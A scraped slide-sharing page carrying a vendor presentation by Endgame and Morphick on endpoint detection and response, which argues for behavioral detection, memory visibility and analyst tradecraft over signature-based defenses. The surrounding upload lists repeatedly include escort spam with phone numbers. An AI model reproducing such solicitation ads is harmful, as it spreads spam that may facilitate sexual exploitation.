Technical track chris calvert-1 30 pm-issa conference-calvert
Technical track chris calvert-1 30 pm-issa conference-calvertTechnical track chris calvert-1 30 pm-issa conference-calvert
Technical track chris calvert-1 30 pm-issa conference-calvert
 
2015 Global APT Summit - Understanding APT threat agent characteristics is ke...
2015 Global APT Summit - Understanding APT threat agent characteristics is ke...2015 Global APT Summit - Understanding APT threat agent characteristics is ke...
2015 Global APT Summit - Understanding APT threat agent characteristics is ke...
 
2015 Global APT Summit Matthew Rosenquist
2015 Global APT Summit Matthew Rosenquist2015 Global APT Summit Matthew Rosenquist
2015 Global APT Summit Matthew Rosenquist
 
Purple Teaming - The Collaborative Future of Penetration Testing
Purple Teaming - The Collaborative Future of Penetration TestingPurple Teaming - The Collaborative Future of Penetration Testing
Purple Teaming - The Collaborative Future of Penetration Testing
 
Sophisticated Attacks vs. Advanced Persistent Security
Sophisticated Attacks vs. Advanced Persistent SecuritySophisticated Attacks vs. Advanced Persistent Security
Sophisticated Attacks vs. Advanced Persistent Security
 
Diagnosis SOC-Atrophy: What To Do When Your SOC Is Sick
Diagnosis SOC-Atrophy: What To Do When Your SOC Is SickDiagnosis SOC-Atrophy: What To Do When Your SOC Is Sick
Diagnosis SOC-Atrophy: What To Do When Your SOC Is Sick
 
Endpoint (big) Data In The Age of Compromise, Ian Rainsburgh
Endpoint (big) Data In The Age of Compromise, Ian RainsburghEndpoint (big) Data In The Age of Compromise, Ian Rainsburgh
Endpoint (big) Data In The Age of Compromise, Ian Rainsburgh
 
pbc_devsecops_eastereggs.2022oct06.jt.pptx
pbc_devsecops_eastereggs.2022oct06.jt.pptxpbc_devsecops_eastereggs.2022oct06.jt.pptx
pbc_devsecops_eastereggs.2022oct06.jt.pptx
 

Recently uploaded

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAndikSusilo4
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 

Recently uploaded (20)

08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 

Three Considerations To Amplify Your Detection and Response Program

  • 1. Three Considerations To Amplify Your Detection and Response Program with Mark Dufresne and David Lavinder Confidential and Proprietary
  • 2. Who Are We? Mark Dufresne (@mark_dufresne) Endgame - Director of Threat Research and Adversary Prevention David Lavinder (@dllavinder) Morphick - Vice President, Threat Intelligence Prior: 13 years at NSA, Operations Chief for Offensive and Defensive Cyber Ops Prior: 7 years as Air Force Digital Network Intelligence Principal Intelligence Analyst Confidential and Proprietary
  • 3. Topics §  3 Key Challenges to a Detection and Response Program –  Advanced TTPs –  Analytical Tradecraft –  Detection Methodologies §  The Morphick / Endgame Approach –  Beyond IOC/Signature Detection –  Uncovering the Full Story –  Integrated Prevention, Detection, and Response Confidential and Proprietary
  • 4. Advanced TTPs §  New Attacks > Existing Defenses –  Paradigm Shift – Attackers are People §  Designed to defeat off-the-shelf defense –  Advanced Evasion Techniques –  Custom rolled malware Confidential and Proprietary §  In-memory Attacks –  DLL side-loading –  Malware-less attacks §  Malicious use of Admin Tools –  Powershell –  WMI
  • 5. The Analytical Tradecraft Gap Confidential and Proprietary
  • 6. The Detection Problem The technology problem: §  Limited enterprise-wide visibility §  Complex tools that don’t work well together §  Static defenses that do not adapt §  Difficult to deploy and maintain solutions §  SOC analyst talent shortage §  Alert fatigue §  Fighting an asymmetric battle §  Unprepared for an incident The people problem: Confidential and Proprietary
  • 7. So What Do I Need? The right tradecraft armed with The right technology Confidential and Proprietary
  • 8. The Right Technology §  Detection –  Beyond IOC/Signature-based detection §  Visibility –  Enabling visibility and rapid detection of unknown advanced attackers §  Prevention –  Automatically protecting against the vast majority of malicious activity Confidential and Proprietary
  • 9. Beyond IOC/Signature-Based Detection §  Signatures (IOCs) aren’t enough §  Attackers adjust tools and tradecraft §  Attackers cycle infrastructure §  Attackers live off the land Good for pivoting. Bad foundation for protection. WHAT ABOUT THE UNKNOWN? Confidential and Proprietary
  • 10. So What Should I Do Instead? 10 Confidential and Proprietary §  Focused on behaviors/techniques §  At each stage off the attacker lifecycle §  Layered and working together You need a different method of detection
  • 11. But EVERYONE is Saying “Behavior” 11 Confidential and Proprietary §  NGAV – malware and exploit prevention §  But what about bypass and file-less attacks? Only part of the problem §  Both EDR and NGAV are adding detection of behaviors §  Capturing process actions and writing rules (IOAs) §  Still a signature. Still brittle. Vulnerable to bypass. §  Experts needed for configuration This is still not the right mix
  • 12. Gather Visibility – Endpoints and Network §  You need full visibility on system events and other data –  Persistence –  Processes –  Network –  Users –  More §  A mountain of data doesn’t do you much good without analytics –  Endgame provides sophisticated analytics to guide the hunt –  Chatbot guides users through the hunt –  Robust API allows for flexible and powerful access and enrichment Confidential and Proprietary
  • 13. Gather Visibility - Memory §  Memory is a permissive environment for attackers. Why? –  Memory analysis doesn’t scale –  Need to know what you are looking for (search based) –  Until now… §  Endgame technology –  Patent-pending technology detects stealthy adversaries in memory in seconds, at scale –  Detects process hollowing, thread hijacking, module hiding, and much more §  Precise identification of suspicious memory and remediation §  Follow on analytic actions such as extraction of IOCs Confidential and Proprietary
  • 14. Behavioral Preventions §  Exploits – Hardware and Software approaches §  Macros – Detecting malicious execution of macros §  Malware – Machine learning (Malwarescore™) §  Kernel-level technique preventions –  Atomic-level system state in the presence of malicious behaviors –  More than streaming rules. Simple configuration, inline and hardened. §  Ransomware Layered prevention minimizes adversary’s capability to entrench Much more than traditional AV Confidential and Proprietary
  • 15. The Right Tradecraft §  Analytical Pivoting –  Discovering unknowns from knowns, across the kill chain §  Generate Threat Intelligence –  Extract as much intel from a positive detection event as possible §  Harden Defenses –  Update defenses with new intelligence Confidential and Proprietary
  • 16. Visibility Across the Kill Chain §  A security analyst’s job doesn’t END at detection, it BEGINS there §  Take that single detection event and explore the kill chain –  How did it get here? –  What was it going to do next? Confidential and Proprietary
  • 17. Visibility Across the Kill Chain §  A security analyst’s job doesn’t END at detection, it BEGINS there §  Take that single detection event and explore the kill chain –  How did it get here? –  What was it going to do next? Confidential and Proprietary
  • 18. The Power of a Security Analyst §  Discovering unknowns from knowns –  Identifying missed detection opportunities §  Telling the whole story –  Tracing an event to earlier kill chain steps §  Then BUILD IT BACK IN §  The analysis tradecraft is getting lost amongst all the tools §  Visibility is key, but good tradecraft unlocks the power of that visibility Confidential and Proprietary
  • 19. SOLUTION §  Combination of Technology and Tradecraft Technology provides layered behavioral prevention Technology provides visibility and access Tradecraft finds the remaining adversary Tradecraft hardens defenses Confidential and Proprietary
  • 20. Managed Endpoint Detection and Response (MEDR) §  Continuous Endpoint Threat Monitoring & Advanced Prevention §  Full Attack Cycle Threat Detection §  Proactive, scalable Threat Hunting §  Detailed Forensic Investigation and Threat Validation §  NSA-CIRA Accredited Incident Response Services Best in-class Tech, Wrapped in Best in-class Service Confidential and Proprietary
  • 21. Interested in learning more? Come see us at RSA §  Endgame Booth, South Hall #1739 §  Morphick Booth, North Hall #5004 Schedule a Demo §  Endgame –  Ashwini Almad –  AAlmad@Endgame.com §  Morphick –  Tom Doepker –  Tom.Doepker@Morphick.com Confidential and Proprietary